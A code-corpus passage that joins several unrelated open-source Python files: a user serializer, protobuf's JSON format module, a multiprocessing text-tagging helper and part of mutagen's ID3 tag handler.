if isinstance(user, Contributor):
contrib = user
user = contrib.user
fullname = user.display_full_name(node=node)
ret = {
'id': str(user._id),
'registered': user.is_registered,
'surname': user.family_name,
'fullname': fullname,
'shortname': fullname if len(fullname) < 50 else fullname[:23] + '...' + fullname[-23:],
'profile_image_url': user.profile_image_url(size=settings.PROFILE_IMAGE_MEDIUM),
'active': user.is_active,
}
if node is not None:
if admin:
flags = {
'visible': False,
'permission': 'read',
}
else:
is_contributor_obj = isinstance(contrib, Contributor)
flags = {
'visible': contrib.visible if is_contributor_obj else node.contributor_set.filter(user=user, visible=True).exists(),
'permission': get_contributor_permissions(contrib, as_list=False) if is_contributor_obj else reduce_permissions(node.get_permissions(user)),
}
ret.update(flags)
if user.is_registered:
ret.update({
'url': user.url,
'absolute_url': user.absolute_url,
'display_absolute_url': user.display_absolute_url,
'date_registered': user.date_registered.strftime('%Y-%m-%d'),
})
if full:
# Add emails
if is_profile:
ret['emails'] = [
{
'address': each,
'primary': each.strip().lower() == user.username.strip().lower(),
'confirmed': True,
} for each in user.emails.values_list('address', flat=True)
] + [
{
'address': each,
'primary': each.strip().lower() == user.username.strip().lower(),
'confirmed': False
}
for each in user.get_unconfirmed_emails_exclude_external_identity()
]
if user.is_merged:
merger = user.merged_by
merged_by = {
'id': str(merger._primary_key),
'url': merger.url,
'absolute_url': merger.absolute_url
}
else:
merged_by = None
default_region = user.get_addon('osfstorage').default_region
available_regions = [region for region in Region.objects.all().values('_id', 'name')]
ret.update({
'activity_points': user.get_activity_points(),
'profile_image_url': user.profile_image_url(size=settings.PROFILE_IMAGE_LARGE),
'is_merged': user.is_merged,
'available_regions': available_regions,
'storage_flag_is_active': storage_i18n_flag_active(),
'default_region': {'name': default_region.name, '_id': default_region._id},
'merged_by': merged_by,
})
if include_node_counts:
projects = user.nodes.exclude(is_deleted=True).filter(type='osf.node').get_roots()
ret.update({
'number_projects': projects.count(),
'number_public_projects': projects.filter(is_public=True).count(),
})
return ret
def serialize_contributors(contribs, node, **kwargs):
return [
serialize_user(contrib, node, **kwargs)
for contrib in contribs
]
def serialize_visible_contributors(node):
# This is optimized when node has .include('contributor__user__guids')
return [
serialize_user(c, node) for c in node.contributor_set.all() if c.visible
]
def add_contributor_json(user, current_user=None, node=None):
"""
Generate a dictionary representation of a user, optionally including # projects shared with `current_user`
:param User user: The user object to serialize
:param User current_user : The user object for a different user, to calculate number of projects in common
:return dict: A dict representing the serialized user data
"""
# get shared projects
if current_user:
n_projects_in_common = current_user.n_projects_in_common(user)
else:
n_projects_in_common = 0
current_employment = None
education = None
if user.jobs:
current_employment = user.jobs[0]['institution']
if user.schools:
education = user.schools[0]['institution']
contributor_json = {
'fullname': user.fullname,
'email': user.email,
'id': user._primary_key,
'employment': current_employment,
'education': education,
'n_projects_in_common': n_projects_in_common,
'registered': user.is_registered,
'active': user.is_active,
'profile_image_url': user.profile_image_url(size=settings.PROFILE_IMAGE_MEDIUM),
'profile_url': user.profile_url
}
if node:
contributor_info = user.contributor_set.get(node=node.parent_node)
contributor_json['permission'] = get_contributor_permissions(contributor_info, as_list=False)
contributor_json['visible'] = contributor_info.visible
return contributor_json
def serialize_unregistered(fullname, email):
"""Serializes an unregistered user."""
user = auth.get_user(email=email)
if user is None:
serialized = {
'fullname': fullname,
'id': None,
'registered': False,
'active': False,
'profile_image_url': profile_image_url(settings.PROFILE_IMAGE_PROVIDER,
email,
use_ssl=True,
size=settings.PROFILE_IMAGE_MEDIUM),
'email': email,
}
else:
serialized = add_contributor_json(user)
serialized['fullname'] = fullname
serialized['email'] = email
return serialized
def serialize_access_requests(node):
"""Serialize access requests for a node"""
return [
{
'user': serialize_user(access_request.creator),
'comment': access_request.comment,
'id': access_request._id
} for access_request in node.requests.filter(
request_type=workflows.RequestTypes.ACCESS.value,
machine_state=workflows.DefaultStates.PENDING.value
).select_related('creator')
]
| apache-2.0 | 3,375,359,164,777,297,000 | 35.384236 | 156 | 0.585026 | false |
Eric-Gaudiello/tensorflow_dev | tensorflow_home/tensorflow_venv/lib/python3.4/site-packages/google/protobuf/json_format.py | 3 | 21174 | # Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains routines for printing protocol messages in JSON format."""
__author__ = '[email protected] (Jie Luo)'
import base64
from datetime import datetime
import json
import math
import re
import sys
from google.protobuf import descriptor
_TIMESTAMPFOMAT = '%Y-%m-%dT%H:%M:%S'
_NUMBER = re.compile(u'[0-9+-][0-9e.+-]*')
_INTEGER = re.compile(u'[0-9+-]')
_INT_TYPES = frozenset([descriptor.FieldDescriptor.CPPTYPE_INT32,
descriptor.FieldDescriptor.CPPTYPE_UINT32,
descriptor.FieldDescriptor.CPPTYPE_INT64,
descriptor.FieldDescriptor.CPPTYPE_UINT64])
_INT64_TYPES = frozenset([descriptor.FieldDescriptor.CPPTYPE_INT64,
descriptor.FieldDescriptor.CPPTYPE_UINT64])
_FLOAT_TYPES = frozenset([descriptor.FieldDescriptor.CPPTYPE_FLOAT,
descriptor.FieldDescriptor.CPPTYPE_DOUBLE])
if str is bytes:
_UNICODETYPE = unicode
else:
_UNICODETYPE = str
class SerializeToJsonError(Exception):
"""Thrown if serialization to JSON fails."""
class ParseError(Exception):
"""Thrown in case of parsing error."""
def MessageToJson(message, including_default_value_fields=False):
"""Converts protobuf message to JSON format.
Args:
message: The protocol buffers message instance to serialize.
including_default_value_fields: If True, singular primitive fields,
repeated fields, and map fields will always be serialized. If
False, only serialize non-empty fields. Singular message fields
and oneof fields are not affected by this option.
Returns:
A string containing the JSON formatted protocol buffer message.
"""
js = _MessageToJsonObject(message, including_default_value_fields)
return json.dumps(js, indent=2)
def _MessageToJsonObject(message, including_default_value_fields):
"""Converts message to an object according to Proto3 JSON Specification."""
message_descriptor = message.DESCRIPTOR
if _IsTimestampMessage(message_descriptor):
return _TimestampMessageToJsonObject(message)
if _IsDurationMessage(message_descriptor):
return _DurationMessageToJsonObject(message)
if _IsFieldMaskMessage(message_descriptor):
return _FieldMaskMessageToJsonObject(message)
if _IsWrapperMessage(message_descriptor):
return _WrapperMessageToJsonObject(message)
return _RegularMessageToJsonObject(message, including_default_value_fields)
def _IsMapEntry(field):
return (field.type == descriptor.FieldDescriptor.TYPE_MESSAGE and
field.message_type.has_options and
field.message_type.GetOptions().map_entry)
def _RegularMessageToJsonObject(message, including_default_value_fields):
"""Converts normal message according to Proto3 JSON Specification."""
js = {}
fields = message.ListFields()
try:
for field, value in fields:
name = field.camelcase_name
if _IsMapEntry(field):
# Convert a map field.
js_map = {}
for key in value:
if isinstance(key, bool):
if key:
recorded_key = 'true'
else:
recorded_key = 'false'
else:
recorded_key = key
js_map[recorded_key] = _ConvertFieldToJsonObject(
field.message_type.fields_by_name['value'],
value[key], including_default_value_fields)
js[name] = js_map
elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
# Convert a repeated field.
repeated = []
for element in value:
repeated.append(_ConvertFieldToJsonObject(
field, element, including_default_value_fields))
js[name] = repeated
else:
js[name] = _ConvertFieldToJsonObject(
field, value, including_default_value_fields)
# Serialize default value if including_default_value_fields is True.
if including_default_value_fields:
message_descriptor = message.DESCRIPTOR
for field in message_descriptor.fields:
# Singular message fields and oneof fields will not be affected.
if ((field.label != descriptor.FieldDescriptor.LABEL_REPEATED and
field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE) or
field.containing_oneof):
continue
name = field.camelcase_name
if name in js:
# Skip the field which has been serailized already.
continue
if _IsMapEntry(field):
js[name] = {}
elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
js[name] = []
else:
js[name] = _ConvertFieldToJsonObject(field, field.default_value)
except ValueError as e:
raise SerializeToJsonError(
'Failed to serialize {0} field: {1}'.format(field.name, e))
return js
def _ConvertFieldToJsonObject(
field, value, including_default_value_fields=False):
"""Converts field value according to Proto3 JSON Specification."""
if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
return _MessageToJsonObject(value, including_default_value_fields)
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM:
enum_value = field.enum_type.values_by_number.get(value, None)
if enum_value is not None:
return enum_value.name
else:
raise SerializeToJsonError('Enum field contains an integer value '
'which can not mapped to an enum value.')
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_STRING:
if field.type == descriptor.FieldDescriptor.TYPE_BYTES:
# Use base64 Data encoding for bytes
return base64.b64encode(value).decode('utf-8')
else:
return value
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_BOOL:
if value:
return True
else:
return False
elif field.cpp_type in _INT64_TYPES:
return str(value)
elif field.cpp_type in _FLOAT_TYPES:
if math.isinf(value):
if value < 0.0:
return '-Infinity'
else:
return 'Infinity'
if math.isnan(value):
return 'NaN'
return value
def _IsTimestampMessage(message_descriptor):
return (message_descriptor.name == 'Timestamp' and
message_descriptor.file.name == 'google/protobuf/timestamp.proto')
def _TimestampMessageToJsonObject(message):
"""Converts Timestamp message according to Proto3 JSON Specification."""
nanos = message.nanos % 1e9
dt = datetime.utcfromtimestamp(
message.seconds + (message.nanos - nanos) / 1e9)
result = dt.isoformat()
if (nanos % 1e9) == 0:
# If there are 0 fractional digits, the fractional
# point '.' should be omitted when serializing.
return result + 'Z'
if (nanos % 1e6) == 0:
# Serialize 3 fractional digits.
return result + '.%03dZ' % (nanos / 1e6)
if (nanos % 1e3) == 0:
# Serialize 6 fractional digits.
return result + '.%06dZ' % (nanos / 1e3)
# Serialize 9 fractional digits.
return result + '.%09dZ' % nanos
def _IsDurationMessage(message_descriptor):
return (message_descriptor.name == 'Duration' and
message_descriptor.file.name == 'google/protobuf/duration.proto')
def _DurationMessageToJsonObject(message):
"""Converts Duration message according to Proto3 JSON Specification."""
if message.seconds < 0 or message.nanos < 0:
result = '-'
seconds = - message.seconds + int((0 - message.nanos) / 1e9)
nanos = (0 - message.nanos) % 1e9
else:
result = ''
seconds = message.seconds + int(message.nanos / 1e9)
nanos = message.nanos % 1e9
result += '%d' % seconds
if (nanos % 1e9) == 0:
# If there are 0 fractional digits, the fractional
# point '.' should be omitted when serializing.
return result + 's'
if (nanos % 1e6) == 0:
# Serialize 3 fractional digits.
return result + '.%03ds' % (nanos / 1e6)
if (nanos % 1e3) == 0:
# Serialize 6 fractional digits.
return result + '.%06ds' % (nanos / 1e3)
# Serialize 9 fractional digits.
return result + '.%09ds' % nanos
def _IsFieldMaskMessage(message_descriptor):
return (message_descriptor.name == 'FieldMask' and
message_descriptor.file.name == 'google/protobuf/field_mask.proto')
def _FieldMaskMessageToJsonObject(message):
"""Converts FieldMask message according to Proto3 JSON Specification."""
result = ''
first = True
for path in message.paths:
if not first:
result += ','
result += path
first = False
return result
def _IsWrapperMessage(message_descriptor):
return message_descriptor.file.name == 'google/protobuf/wrappers.proto'
def _WrapperMessageToJsonObject(message):
return _ConvertFieldToJsonObject(
message.DESCRIPTOR.fields_by_name['value'], message.value)
def _DuplicateChecker(js):
result = {}
for name, value in js:
if name in result:
raise ParseError('Failed to load JSON: duplicate key ' + name)
result[name] = value
return result
def Parse(text, message):
"""Parses a JSON representation of a protocol message into a message.
Args:
text: Message JSON representation.
message: A protocol beffer message to merge into.
Returns:
The same message passed as argument.
Raises::
ParseError: On JSON parsing problems.
"""
if not isinstance(text, _UNICODETYPE): text = text.decode('utf-8')
try:
if sys.version_info < (2, 7):
# object_pair_hook is not supported before python2.7
js = json.loads(text)
else:
js = json.loads(text, object_pairs_hook=_DuplicateChecker)
except ValueError as e:
raise ParseError('Failed to load JSON: ' + str(e))
_ConvertFieldValuePair(js, message)
return message
def _ConvertFieldValuePair(js, message):
"""Convert field value pairs into regular message.
Args:
js: A JSON object to convert the field value pairs.
message: A regular protocol message to record the data.
Raises:
ParseError: In case of problems converting.
"""
names = []
message_descriptor = message.DESCRIPTOR
for name in js:
try:
field = message_descriptor.fields_by_camelcase_name.get(name, None)
if not field:
raise ParseError(
'Message type "{0}" has no field named "{1}".'.format(
message_descriptor.full_name, name))
if name in names:
raise ParseError(
'Message type "{0}" should not have multiple "{1}" fields.'.format(
message.DESCRIPTOR.full_name, name))
names.append(name)
# Check no other oneof field is parsed.
if field.containing_oneof is not None:
oneof_name = field.containing_oneof.name
if oneof_name in names:
raise ParseError('Message type "{0}" should not have multiple "{1}" '
'oneof fields.'.format(
message.DESCRIPTOR.full_name, oneof_name))
names.append(oneof_name)
value = js[name]
if value is None:
message.ClearField(field.name)
continue
# Parse field value.
if _IsMapEntry(field):
message.ClearField(field.name)
_ConvertMapFieldValue(value, message, field)
elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
message.ClearField(field.name)
if not isinstance(value, list):
raise ParseError('repeated field {0} must be in [] which is '
'{1}'.format(name, value))
for item in value:
if item is None:
continue
if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
sub_message = getattr(message, field.name).add()
_ConvertMessage(item, sub_message)
else:
getattr(message, field.name).append(
_ConvertScalarFieldValue(item, field))
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
sub_message = getattr(message, field.name)
_ConvertMessage(value, sub_message)
else:
setattr(message, field.name, _ConvertScalarFieldValue(value, field))
except ParseError as e:
if field and field.containing_oneof is None:
raise ParseError('Failed to parse {0} field: {1}'.format(name, e))
else:
raise ParseError(str(e))
except ValueError as e:
raise ParseError('Failed to parse {0} field: {1}'.format(name, e))
except TypeError as e:
raise ParseError('Failed to parse {0} field: {1}'.format(name, e))
def _ConvertMessage(value, message):
"""Convert a JSON object into a message.
Args:
value: A JSON object.
message: A WKT or regular protocol message to record the data.
Raises:
ParseError: In case of convert problems.
"""
message_descriptor = message.DESCRIPTOR
if _IsTimestampMessage(message_descriptor):
_ConvertTimestampMessage(value, message)
elif _IsDurationMessage(message_descriptor):
_ConvertDurationMessage(value, message)
elif _IsFieldMaskMessage(message_descriptor):
_ConvertFieldMaskMessage(value, message)
elif _IsWrapperMessage(message_descriptor):
_ConvertWrapperMessage(value, message)
else:
_ConvertFieldValuePair(value, message)
def _ConvertTimestampMessage(value, message):
"""Convert a JSON representation into Timestamp message."""
timezone_offset = value.find('Z')
if timezone_offset == -1:
timezone_offset = value.find('+')
if timezone_offset == -1:
timezone_offset = value.rfind('-')
if timezone_offset == -1:
raise ParseError(
'Failed to parse timestamp: missing valid timezone offset.')
time_value = value[0:timezone_offset]
# Parse datetime and nanos
point_position = time_value.find('.')
if point_position == -1:
second_value = time_value
nano_value = ''
else:
second_value = time_value[:point_position]
nano_value = time_value[point_position + 1:]
date_object = datetime.strptime(second_value, _TIMESTAMPFOMAT)
td = date_object - datetime(1970, 1, 1)
seconds = td.seconds + td.days * 24 * 3600
if len(nano_value) > 9:
raise ParseError(
'Failed to parse Timestamp: nanos {0} more than '
'9 fractional digits.'.format(nano_value))
if nano_value:
nanos = round(float('0.' + nano_value) * 1e9)
else:
nanos = 0
# Parse timezone offsets
if value[timezone_offset] == 'Z':
if len(value) != timezone_offset + 1:
raise ParseError(
'Failed to parse timestamp: invalid trailing data {0}.'.format(value))
else:
timezone = value[timezone_offset:]
pos = timezone.find(':')
if pos == -1:
raise ParseError(
'Invalid timezone offset value: ' + timezone)
if timezone[0] == '+':
seconds += (int(timezone[1:pos])*60+int(timezone[pos+1:]))*60
else:
seconds -= (int(timezone[1:pos])*60+int(timezone[pos+1:]))*60
# Set seconds and nanos
message.seconds = int(seconds)
message.nanos = int(nanos)
def _ConvertDurationMessage(value, message):
"""Convert a JSON representation into Duration message."""
if value[-1] != 's':
raise ParseError(
'Duration must end with letter "s": ' + value)
try:
duration = float(value[:-1])
except ValueError:
raise ParseError(
'Couldn\'t parse duration: ' + value)
message.seconds = int(duration)
message.nanos = int(round((duration - message.seconds) * 1e9))
def _ConvertFieldMaskMessage(value, message):
"""Convert a JSON representation into FieldMask message."""
for path in value.split(','):
message.paths.append(path)
def _ConvertWrapperMessage(value, message):
"""Convert a JSON representation into Wrapper message."""
field = message.DESCRIPTOR.fields_by_name['value']
setattr(message, 'value', _ConvertScalarFieldValue(value, field))
def _ConvertMapFieldValue(value, message, field):
"""Convert map field value for a message map field.
Args:
value: A JSON object to convert the map field value.
message: A protocol message to record the converted data.
field: The descriptor of the map field to be converted.
Raises:
ParseError: In case of convert problems.
"""
if not isinstance(value, dict):
raise ParseError(
'Map fieled {0} must be in {} which is {1}.'.format(field.name, value))
key_field = field.message_type.fields_by_name['key']
value_field = field.message_type.fields_by_name['value']
for key in value:
key_value = _ConvertScalarFieldValue(key, key_field, True)
if value_field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
_ConvertMessage(value[key], getattr(message, field.name)[key_value])
else:
getattr(message, field.name)[key_value] = _ConvertScalarFieldValue(
value[key], value_field)
def _ConvertScalarFieldValue(value, field, require_quote=False):
"""Convert a single scalar field value.
Args:
value: A scalar value to convert the scalar field value.
field: The descriptor of the field to convert.
require_quote: If True, '"' is required for the field value.
Returns:
The converted scalar field value
Raises:
ParseError: In case of convert problems.
"""
if field.cpp_type in _INT_TYPES:
return _ConvertInteger(value)
elif field.cpp_type in _FLOAT_TYPES:
return _ConvertFloat(value)
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_BOOL:
return _ConvertBool(value, require_quote)
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_STRING:
if field.type == descriptor.FieldDescriptor.TYPE_BYTES:
return base64.b64decode(value)
else:
return value
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM:
# Convert an enum value.
enum_value = field.enum_type.values_by_name.get(value, None)
if enum_value is None:
raise ParseError(
'Enum value must be a string literal with double quotes. '
'Type "{0}" has no value named {1}.'.format(
field.enum_type.full_name, value))
return enum_value.number
def _ConvertInteger(value):
"""Convert an integer.
Args:
value: A scalar value to convert.
Returns:
The integer value.
Raises:
ParseError: If an integer couldn't be consumed.
"""
if isinstance(value, float):
raise ParseError('Couldn\'t parse integer: {0}'.format(value))
if isinstance(value, _UNICODETYPE) and not _INTEGER.match(value):
raise ParseError('Couldn\'t parse integer: "{0}"'.format(value))
return int(value)
def _ConvertFloat(value):
"""Convert an floating point number."""
if value == 'nan':
raise ParseError('Couldn\'t parse float "nan", use "NaN" instead')
try:
# Assume Python compatible syntax.
return float(value)
except ValueError:
# Check alternative spellings.
if value == '-Infinity':
return float('-inf')
elif value == 'Infinity':
return float('inf')
elif value == 'NaN':
return float('nan')
else:
raise ParseError('Couldn\'t parse float: {0}'.format(value))
def _ConvertBool(value, require_quote):
"""Convert a boolean value.
Args:
value: A scalar value to convert.
require_quote: If True, '"' is required for the boolean value.
Returns:
The bool parsed.
Raises:
ParseError: If a boolean value couldn't be consumed.
"""
if require_quote:
if value == 'true':
return True
elif value == 'false':
return False
else:
raise ParseError('Expect "true" or "false", not {0}.'.format(value))
if not isinstance(value, bool):
raise ParseError('Expected true or false without quotes.')
return value
| gpl-3.0 | -3,895,382,516,134,386,000 | 33.485342 | 80 | 0.676396 | false |
xflows/tf_core | tf_core/nltoolkit/lib/tagging_common_parallel.py | 1 | 5237 | import multiprocessing
from functools import partial
def tag_document(document,tagger,tagger_function,args,kwargs,input_annotation,output_annotation):
if document.features['contentType'] == "Text":
if not document.text:
pass
for annotation,subtext in document.get_annotations_with_text(input_annotation): #all annotations of this type
if subtext:
new_feature=getattr(tagger,tagger_function)(subtext,*args,**kwargs)
if new_feature!=None:
annotation.features[output_annotation]=new_feature
return document
def universal_word_tagger_hub(adc,tagger_dict,input_annotation,output_annotation):
tagger=tagger_dict['object']
tagger_function=tagger_dict['function']
args=tagger_dict.get('args',[])
kwargs=tagger_dict.get('kargs',{})
pool = multiprocessing.Pool(processes=multiprocessing.cpu_count())
print("evo nas!!!")
#parallel for document in adc.documents:
new_documents=pool.map(
partial(tag_document,
tagger=tagger,
tagger_function=tagger_function,
args=args,
kwargs=kwargs,
input_annotation=input_annotation,
output_annotation=output_annotation),
adc.documents,
100 #chunksize, constructs list of this size which are passed to pool workers
)
pool.close()
pool.join()
adc.documents=new_documents #list(new_documents)
print("dijo!2!!")
return {'adc': adc }
def sentance_tag_a_document(doc,tagger,tagger_function,args,kwargs,
element_annotation_name,group_annotation_name,output_annotation_name):
if doc.features['contentType'] == "Text":
if not doc.text:
pass
group_annotations=sorted(doc.get_annotations_with_text(group_annotation_name),key=lambda x: x[0].span_start)
element_annotations=sorted(doc.get_annotations_with_text(element_annotation_name),key=lambda x: x[0].span_start)
text_grouped=[] #text_groups= [['First','sentence',['Second','sentance']]
annotations_grouped=[] #annotations_grouped= [[<Annotation span_start:0 span_ned:4>, <Annotation span_start:6 span_ned:11>],[...
i=0
for group_annotation,_ in group_annotations:
elements=[]
sentence_annotations=[]
#find elementary annotations 'contained' in the group_annotation
while i<len(element_annotations) and element_annotations[i][0].span_end<=group_annotation.span_end:
annotation=element_annotations[i][0]
text_block=element_annotations[i][1]
elements.append(text_block)
sentence_annotations.append(annotation)
i+=1
text_grouped.append(elements)
annotations_grouped.append(sentence_annotations)
new_features=getattr(tagger,tagger_function)(text_grouped,*args,**kwargs)
for sentence_features, sentence_annotations in zip(new_features,annotations_grouped):
for feature,annotation in zip(sentence_features,sentence_annotations):
annotation.features[output_annotation_name]=feature[1]
return doc
def universal_sentence_tagger_hub(input_dict):
tagger_dict = input_dict['pos_tagger']
tagger=tagger_dict['object']
tagger_function=tagger_dict['function']
args=tagger_dict.get('args',[])
kwargs=tagger_dict.get('kargs',{})
group_annotation_name = input_dict['group_annotation']
element_annotation_name = input_dict['element_annotation']
output_annotation_name = input_dict['output_feature']
adc = input_dict['adc']
pool = multiprocessing.Pool(processes=multiprocessing.cpu_count())
print("evo nas!!!")
#parallel for document in adc.documents:
new_documents=pool.map(
partial(sentance_tag_a_document,
tagger=tagger,
tagger_function=tagger_function,
args=args,
kwargs=kwargs,
element_annotation_name=element_annotation_name,
group_annotation_name=group_annotation_name,
output_annotation_name=output_annotation_name),
adc.documents,
100 #chunksize, constructs list of this size which are passed to pool workers
)
pool.close()
pool.join()
adc.documents=new_documents
print("dijo!!!")
return {'adc': adc }
# def chunks(l, n):
# c=[[] for _ in range(n)]
# for i in range(l):
# c[i%n].append(i)
# return c
#
# print chunks(10,6)
#
# from multiprocessing import Process, Value, Array, Pool
#
# def f(a,indices):
# for i in indices:
# a[i] = -a[i]
#
# if __name__ == '__main__':
# a=[[i] for i in range(100)]
# arr = Array('i', a)
#
# no_of_workers=6
# workers=[Process(target=f, args=(arr, indices)) for indices in chunks(len(arr),no_of_workers)]
#
#
# for p in workers:
# p.start()
# for p in workers:
# p.join()
#
# print arr[:]
# print a
#
#
# #pool = multiprocessing.Pool(processes=6)
# #case_data = RAW_DATASET
# #pool.apply(f, args=(num, arr))
# #pool.close()
# #pool.join()
| mit | 1,324,712,501,938,792,000 | 33.453947 | 136 | 0.625167 | false |
digris/openbroadcast.org | website/tools/mutagen/id3/_file.py | 2 | 12328 | # -*- coding: utf-8 -*-
# Copyright (C) 2005 Michael Urman
# 2006 Lukas Lalinsky
# 2013 Christoph Reiter
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
import struct
import mutagen
from mutagen._util import (
insert_bytes,
delete_bytes,
enum,
loadfile,
convert_error,
read_full,
)
from mutagen._tags import PaddingInfo
from ._util import error, ID3NoHeaderError, ID3UnsupportedVersionError, BitPaddedInt
from ._tags import ID3Tags, ID3Header, ID3SaveConfig
from ._id3v1 import MakeID3v1, find_id3v1
@enum
class ID3v1SaveOptions(object):
REMOVE = 0
"""ID3v1 tags will be removed"""
UPDATE = 1
"""ID3v1 tags will be updated but not added"""
CREATE = 2
"""ID3v1 tags will be created and/or updated"""
class ID3(ID3Tags, mutagen.Metadata):
"""ID3(filething=None)
A file with an ID3v2 tag.
If any arguments are given, the :meth:`load` is called with them. If no
arguments are given then an empty `ID3` object is created.
::
ID3("foo.mp3")
# same as
t = ID3()
t.load("foo.mp3")
Arguments:
filething (filething): or `None`
Attributes:
version (tuple[int]): ID3 tag version as a tuple
unknown_frames (list[bytes]): raw frame data of any unknown frames
found
size (int): the total size of the ID3 tag, including the header
"""
__module__ = "mutagen.id3"
PEDANTIC = True
"""`bool`:
.. deprecated:: 1.28
Doesn't have any effect
"""
filename = None
def __init__(self, *args, **kwargs):
self._header = None
self._version = (2, 4, 0)
super(ID3, self).__init__(*args, **kwargs)
@property
def version(self):
"""`tuple`: ID3 tag version as a tuple (of the loaded file)"""
if self._header is not None:
return self._header.version
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def f_unsynch(self):
if self._header is not None:
return self._header.f_unsynch
return False
@property
def f_extended(self):
if self._header is not None:
return self._header.f_extended
return False
@property
def size(self):
if self._header is not None:
return self._header.size
return 0
def _pre_load_header(self, fileobj):
# XXX: for aiff to adjust the offset..
pass
@convert_error(IOError, error)
@loadfile()
def load(
self, filething, known_frames=None, translate=True, v2_version=4, load_v1=True
):
"""Load tags from a filename.
Args:
filename (filething): filename or file object to load tag data from
known_frames (Dict[`mutagen.text`, `Frame`]): dict mapping frame
IDs to Frame objects
translate (bool): Update all tags to ID3v2.3/4 internally. If you
intend to save, this must be true or you have to
call update_to_v23() / update_to_v24() manually.
v2_version (int): if update_to_v23 or update_to_v24 get called
(3 or 4)
load_v1 (bool): Load tags from ID3v1 header if present. If both
ID3v1 and ID3v2 headers are present, combine the tags from
the two, with ID3v2 having precedence.
.. versionadded:: 1.42
Example of loading a custom frame::
my_frames = dict(mutagen.id3.Frames)
class XMYF(Frame): ...
my_frames["XMYF"] = XMYF
mutagen.id3.ID3(filename, known_frames=my_frames)
"""
fileobj = filething.fileobj
if v2_version not in (3, 4):
raise ValueError("Only 3 and 4 possible for v2_version")
self.unknown_frames = []
self._header = None
self._padding = 0
self._pre_load_header(fileobj)
try:
self._header = ID3Header(fileobj)
except (ID3NoHeaderError, ID3UnsupportedVersionError):
if not load_v1:
raise
frames, offset = find_id3v1(fileobj, v2_version, known_frames)
if frames is None:
raise
self.version = ID3Header._V11
for v in frames.values():
if len(self.getall(v.HashKey)) == 0:
self.add(v)
else:
# XXX: attach to the header object so we have it in spec parsing..
if known_frames is not None:
self._header._known_frames = known_frames
data = read_full(fileobj, self.size - 10)
remaining_data = self._read(self._header, data)
self._padding = len(remaining_data)
if load_v1:
v1v2_ver = 4 if self.version[1] == 4 else 3
frames, offset = find_id3v1(fileobj, v1v2_ver, known_frames)
if frames:
for v in frames.values():
if len(self.getall(v.HashKey)) == 0:
self.add(v)
if translate:
if v2_version == 3:
self.update_to_v23()
else:
self.update_to_v24()
def _prepare_data(self, fileobj, start, available, v2_version, v23_sep, pad_func):
if v2_version not in (3, 4):
raise ValueError("Only 3 or 4 allowed for v2_version")
config = ID3SaveConfig(v2_version, v23_sep)
framedata = self._write(config)
needed = len(framedata) + 10
fileobj.seek(0, 2)
trailing_size = fileobj.tell() - start
info = PaddingInfo(available - needed, trailing_size)
new_padding = info._get_padding(pad_func)
if new_padding < 0:
raise error("invalid padding")
new_size = needed + new_padding
new_framesize = BitPaddedInt.to_str(new_size - 10, width=4)
header = struct.pack(">3sBBB4s", b"ID3", v2_version, 0, 0, new_framesize)
data = header + framedata
assert new_size >= len(data)
data += (new_size - len(data)) * b"\x00"
assert new_size == len(data)
return data
@convert_error(IOError, error)
@loadfile(writable=True, create=True)
def save(self, filething=None, v1=1, v2_version=4, v23_sep="/", padding=None):
"""save(filething=None, v1=1, v2_version=4, v23_sep='/', padding=None)
Save changes to a file.
Args:
filething (filething):
Filename to save the tag to. If no filename is given,
the one most recently loaded is used.
v1 (ID3v1SaveOptions):
if 0, ID3v1 tags will be removed.
if 1, ID3v1 tags will be updated but not added.
if 2, ID3v1 tags will be created and/or updated
v2 (int):
version of ID3v2 tags (3 or 4).
v23_sep (text):
the separator used to join multiple text values
if v2_version == 3. Defaults to '/' but if it's None
will be the ID3v2v2.4 null separator.
padding (:obj:`mutagen.PaddingFunction`)
Raises:
mutagen.MutagenError
By default Mutagen saves ID3v2.4 tags. If you want to save ID3v2.3
tags, you must call method update_to_v23 before saving the file.
The lack of a way to update only an ID3v1 tag is intentional.
"""
